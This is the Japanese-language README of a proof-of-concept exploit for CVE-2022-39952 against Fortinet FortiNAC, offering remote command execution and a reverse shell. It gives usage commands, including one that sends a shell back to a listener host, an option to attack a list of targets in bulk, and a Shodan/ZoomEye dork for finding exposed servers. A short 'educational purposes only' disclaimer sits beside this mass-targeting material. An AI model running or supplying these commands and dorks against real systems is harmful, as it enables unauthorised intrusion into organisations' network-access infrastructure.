
CVE-2022-39952用の概念実証エクスプロイト。Fortinet FortiNACを標的にし、脆弱なサーバーでのリモートコマンド実行とリバースシェルを可能にします。
このエクスプロイトにより、攻撃者はFortiNACサーバ上で任意のコマンドを実行できます。これはhorizon3aiによって開発されたPoCに基づいており、複数のホストを標的にするための追加オプションがあります。
免責事項: このエクスプロイトは教育目的のみです。責任を持って、許可を得た上で使用してください。
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-l LIST, --list LIST List of targets
-lh LHOST, --lhost LHOST
The local host for the reverse shell
-lp LPORT, --lport LPORT
The local port for the reverse shell
このエクスプロイトを使用するには、システムにPython 3.xがインストールされている必要があります。
Python 3.x
requestsモジュール
concurrent.futuresモジュール
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444
$ python exploit.py -t 192.168.1.100
$ python exploit.py -l targets.txt
このエクスプロイトは限られた数のターゲットでしかテストされていないため、その効果は異なる可能性があります。ZoomEyeおよびShodanで潜在的なターゲットを見つけるためのdorkは次のとおりです:
title:"FortiNAC" +"JSESSIONID"